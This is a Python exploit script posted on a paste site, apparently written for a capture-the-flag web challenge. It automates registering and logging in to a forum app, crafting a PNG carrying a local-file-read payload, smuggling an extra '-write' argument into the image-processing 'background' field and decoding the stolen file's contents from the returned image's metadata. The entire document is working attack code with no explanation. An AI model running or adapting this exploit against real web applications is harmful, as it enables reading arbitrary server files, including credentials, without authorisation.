Untitled

mail@pastecode.io avatar
unknown
python
a year ago
4.3 kB
2
Indexable
Never
import requests, os, random, string, time, re, subprocess, tempfile, sys

session = requests.Session()
proxy = {"http":"http://127.0.0.1:8080"}
file_to_obtain = sys.argv[1]


def gen_random_string(length):
    letters = string.ascii_lowercase
    result_str = ''.join(random.choice(letters) for i in range(length))
    return result_str


def create_exploit_png(lfi_payload, image_filepath):
    os.system(f"python3 generate.py -f '{lfi_payload}' -o {image_filepath} 1>/dev/null 2>/dev/null")


def login(url):
    login_url = f"{url}/auth/login"
    login_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1:1337", "Connection": "close", "Referer": "http://127.0.0.1:1337/auth/login", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
    login_data = {"username": "asdasd", "password": "asdasd"}
    r = session.post(login_url, headers=login_headers, data=login_data, proxies=proxy)
    if "auth/login" in r.url:
        return False
    else:
        return True


def register(url):
    register_url = f"{url}/auth/register"
    register_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1:1337", "Connection": "close", "Referer": "http://127.0.0.1:1337/auth/register", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
    register_data = {"username": "asdasd", "password": "asdasd"}
    session.post(register_url, headers=register_headers, data=register_data, proxies=proxy)


def get_session_cookies(url):
    if not login(url):
        register(url)
        login(url)

    print("Cookies obtained")


def send_exploit_request(url, image_filename, image_filepath):
    exploit_url = f"{url}/forum/post"

    files = [
        ('message', (None, 'bbbbbbrrrb')),
        ('rotate', (None, '90')),
        ('parentId', (None, '11')),
        ('format', (None, 'png')),
        ('background', (None, f'blue -write ./uploads/{image_filename}')),
        #('srcPath', (None, f'http://localhost/{image_filename}')),
        ('flip', (None, 'true')),
        ('image', (f"{image_filename}", open(image_filepath, 'rb'), 'image/png')),
    ]

    response = session.post(exploit_url, files=files, proxies=proxy)


def get_image(url, image_filename, new_image_filepath):
    r = session.get(f"{url}/uploads/{image_filename}")
    with open(new_image_filepath,"wb") as f:
        f.write(r.content)


def decode_image_data(new_image_filepath):
    cmd_output = subprocess.check_output(f"identify -verbose {new_image_filepath}", shell=True, text=True)
    extract1 = re.findall(r"Raw profile type:(.*?)signature",cmd_output,re.DOTALL)
    extract2 = re.findall(r"\n(.*?)\n",extract1[0],re.DOTALL)
    lfi_data = bytes.fromhex(''.join(extract2)).decode()
    print(lfi_data)


def get_image_data_and_decode(url,image_filename,image_filepath):
    get_image(url, image_filename,image_filepath)
    decode_image_data(image_filepath)


def main():
    image_filename = gen_random_string(6) + ".png"
    image_filepath = f"/tmp/{image_filename}"

    exploited_image_filepath = f"/tmp/explo_{image_filename}"
    #url = "http://167.172.62.51:31903"
    url = "http://127.0.0.1:1337"

    print("creating exploit")
    create_exploit_png(file_to_obtain, image_filepath)

    print("getting session cookies")
    get_session_cookies(url)

    print("sending exploit")
    send_exploit_request(url, image_filename, image_filepath)

    print(f"recovering image data:{image_filepath} \n")
    get_image_data_and_decode(url, image_filename,exploited_image_filepath)

if __name__ == '__main__':
    main()